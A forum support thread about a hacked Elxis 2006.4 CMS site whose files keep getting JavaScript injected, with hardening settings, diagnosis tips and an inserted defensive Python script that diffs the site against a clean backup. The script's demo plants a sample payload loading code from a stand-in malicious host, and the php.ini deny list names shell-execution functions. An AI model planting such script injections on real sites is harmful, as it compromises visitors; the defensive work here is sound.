Elxis CMS Forum

Support => Security => Topic started by: kalexan on September 24, 2010, 13:11:00

Title: Securing Elxis 2006.4: when upgrade is not an option...
Post by: kalexan on September 24, 2010, 13:11:00
Hello.
I created a website 3-4 years ago using Elxis 2006.4. I also added the Star Gallery 1.7 and Letterman components, I created a bot to easily add a gallery inside articles, and I made a few more modifications to the menu system, template system and other parts.
For more than 6 months the site has been getting hit by hackers. After every attack, all html and php files contain a JavaScript code (XSS attack). I have checked the site's logs thoroughly and I haven't found out how this is done. I have also taken the following measures:
Code:
register_globals = Off
allow_url_fopen = Off
disable_functions = proc_open , popen, disk_free_space, diskfreespace, set_time_limit, leak, tmpfile, exec, system, shell_exec, passthru
The site owner has asked me to find the security hole, but so far with no luck. Upgrade is not an option, since I would have to replace Star Gallery and Letterman with new components (they are no longer supported and are probably incompatible with the latest Elxis). I would also have to reapply all the modifications I made.
I would appreciate any help or hint on this. Thank you all in advance.
Title: Re: Securing Elxis 2006.4: when upgrade is not an option...
Post by: datahell on September 24, 2010, 13:21:22
Most likely one of the following is happening:

1. You have a virus on your computer. If you have any toolbars installed in your browser, remove them. Make sure there are no malicious programs on your computer, especially in your browser and your FTP client.

2. When you are logged in to the Elxis administration, close all other open windows. If you browse other sites (especially suspicious ones) while you are logged in and there is malicious JavaScript code on the other site, that script can steal your data.

It would be really useful if you told us some information about the Elxis environment: your server's OS, the PHP version, how PHP runs (Apache module, CGI, suPHP, etc.), the server's control panel, and whether the PHP setup meets a minimum security level (register_globals, allow_url_fopen, etc.).
Title: Re: Securing Elxis 2006.4: when upgrade is not an option...
Post by: kalexan on September 24, 2010, 15:47:30
Thank you for the quick response!

As far as my customer's computer is concerned, I know he has up-to-date antivirus software installed. I will ask him about any unusual Windows behaviour, but I don't think that this is the case. Moreover, my computer is clean of trojans and viruses for sure (I also have commercial antivirus software installed), and I don't use any adware crap or browser plugins (except, of course, the priceless Firebug, Web Developer, SeoQuake etc. Firefox plugins)!

About the server environment, here is a copy-paste from the Elxis system information tab:
Code:
Database Version:    mysql 5.1.50 (Version: 5.1.50)
PHP Version: 5.2.13
Web Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
WebServer to PHP Interface: cgi-fcgi
Elxis CMS Version: 2006.4 Stable rev1080 [ Nestor ] 04-December-2006 23:08 GMT+2
Browser: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.13) Gecko/20100914 Firefox/3.5.13 ( .NET CLR 3.5.30729)
Relevant PHP Settings:
        Safe Mode: OFF
        Open basedir: none
        Display Errors: ON
        Short Open Tags: ON
        File Uploads: ON
        Magic Quotes: ON
        Register Globals: OFF
        Output Buffering: OFF
        Session save path: none
        Session auto start: 0
        XML Enabled: Yes
        Zlib Enabled: Yes
        Disabled Functions: proc_open , popen, disk_free_space, diskfreespace, set_time_limit, leak, tmpfile, exec, system, shell_exec, passthru
        WYSIWYG Editor: TinyMCE WYSIWYG Editor
(sorry for the Greek labels)
All appropriate PHP security measures are applied through directives set in php.ini files inside every core folder of Elxis (the root directory and all sub-directories).
Finally, all folder and file permissions have been checked and seem to be OK.
I have a feeling that the problem resides in TinyMCE's image browser plugin, iBrowser. I can't deactivate it because my customer uses it extensively. Any thoughts on this?
Thank you again for your support.
Title: Re: Securing Elxis 2006.4: when upgrade is not an option...
Post by: CREATIVE Options on September 24, 2010, 15:58:26
I suggest you:
1. check the source code of any third-party module / component / bot that you install, even if it is not published, for JavaScript that doesn't belong.
2. also check the file system with updiag.
3. check the log files.


Further, if you need any help, don't hesitate to contact me.

Title: Re: Securing Elxis 2006.4: when upgrade is not an option...
Post by: kalexan on September 24, 2010, 16:21:14
@Sirigos: Thanks for your answer.
1) I have a backup of clean files that I use to overwrite the infected ones.
2) What is that? If it is an OS command I can't use it because, as I said, the website is in a reseller hosting environment.
3) I have already checked the log files but I haven't found anything strange.
I just renamed the iBrowser plugin folder and made the appropriate adjustments to tiny_mce's plugin configuration. I will keep you informed on how things go.
Thank you for your support!
Title: Re: Securing Elxis 2006.4: when upgrade is not an option...
Post by: CREATIVE Options on September 24, 2010, 16:59:15
2) In your Elxis version, in the administration area -> Tools, is Updiag available?
Title: Re: Securing Elxis 2006.4: when upgrade is not an option...
Post by: kalexan on September 27, 2010, 10:48:12
Unfortunately no. It must have been added in later versions of Elxis.
The good thing is that the site has been running smoothly for 3 days. I am keeping track of the site log files in case I see something strange, and I will post my results back here.
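The file-system check that CREATIVE Options suggests (updiag, which this Elxis version does not have) and the clean-backup overwrite that kalexan describes can be combined into one baseline-and-diff check. The block below is an added example written for this thread; it is not Elxis code and not updiag. It hashes every file under a clean backup tree and under a copy of the live tree, reports added, missing and modified files, and for each modified or added .php/.html/.js file lists the <script> blocks that the clean copy does not contain, so the site's own scripts are not reported. The directory layout, file names and the payload URL (malware.invalid, a reserved non-resolving domain) in demo() are constructed for the demonstration.

```python
"""Baseline-and-diff integrity check for a PHP web root (added example, not Elxis code)."""
import hashlib
import os
import re
import tempfile

# Extensions the reported injection touched (html and php), plus js/inc for completeness.
TEXT_EXT = {".php", ".html", ".htm", ".js", ".inc"}
# Whole <script ...>...</script> blocks, case-insensitive, spanning lines.
SCRIPT_RE = re.compile(r"<script\b[^>]*>.*?</script>", re.IGNORECASE | re.DOTALL)


def sha256_file(path):
    """Streamed SHA-256 of a file so large uploads do not need to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root):
    """Map 'relative/path' -> sha256 for every regular file under root."""
    manifest = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            manifest[rel] = sha256_file(full)
    return manifest


def script_blocks(path):
    """All <script> blocks in a text file, decoded leniently."""
    with open(path, "rb") as f:
        return SCRIPT_RE.findall(f.read().decode("utf-8", "replace"))


def diff_trees(clean_root, live_root):
    """Compare a live web root against a clean backup tree."""
    clean = build_manifest(clean_root)
    live = build_manifest(live_root)
    report = {"added": [], "modified": [], "missing": [], "injected": {}}
    for rel, digest in live.items():
        if rel not in clean:
            report["added"].append(rel)
        elif clean[rel] != digest:
            report["modified"].append(rel)
    report["missing"] = [rel for rel in clean if rel not in live]
    for key in ("added", "modified", "missing"):
        report[key].sort()
    # For every changed or new text file, keep only the <script> blocks the
    # clean copy does not have: those are the injected ones, not the site's own.
    for rel in report["added"] + report["modified"]:
        if os.path.splitext(rel)[1].lower() not in TEXT_EXT:
            continue
        known = set()
        if rel in clean:
            known = set(script_blocks(os.path.join(clean_root, rel)))
        new = [s for s in script_blocks(os.path.join(live_root, rel)) if s not in known]
        if new:
            report["injected"][rel] = new
    return report


def demo():
    """Constructed sample: a three-file 'clean' site and a 'live' copy tampered with
    the way the thread describes (payload appended to every .php/.html file),
    plus one dropped file the baseline never had. Paths and payload are made up."""
    base = tempfile.mkdtemp(prefix="elxis-check-")
    clean, live = os.path.join(base, "clean"), os.path.join(base, "live")
    files = {
        "index.php": "<?php include 'includes/frontend.php'; ?>\n",
        "templates/main.html": '<html><head><script src="/js/site.js"></script></head></html>\n',
        "images/logo.gif": "GIF89a",
    }
    for root in (clean, live):
        for rel, body in files.items():
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w", encoding="utf-8") as f:
                f.write(body)
    # Hypothetical payload; malware.invalid never resolves.
    payload = '<script src="http://malware.invalid/x.js"></script>\n'
    for rel in ("index.php", "templates/main.html"):
        with open(os.path.join(live, rel), "a", encoding="utf-8") as f:
            f.write(payload)
    with open(os.path.join(live, "images", "x.php"), "w", encoding="utf-8") as f:
        f.write("<?php /* dropped file the clean tree never had */ ?>\n")
    return diff_trees(clean, live)


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

Run it on a machine you trust, against a copy of the live tree pulled down over FTP/SFTP, rather than on the hosting account itself, and keep the clean tree (or its manifest) off the host so an attacker on the server cannot rewrite the baseline. The `added` list matters as much as `modified`: a dropped .php file in a directory that should only hold images is exactly what the injection's re-entry point tends to look like, and the modification time of the earliest changed file gives a time window to search in the access logs. Overwriting from the clean backup removes the payload but not the hole, so rerun the diff after each restore.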
Title: Re: Securing Elxis 2006.4: when upgrade is not an option...
Post by: CREATIVE Options on September 27, 2010, 14:57:27
OK, if you need any help, send me a PM with full access so I can check it.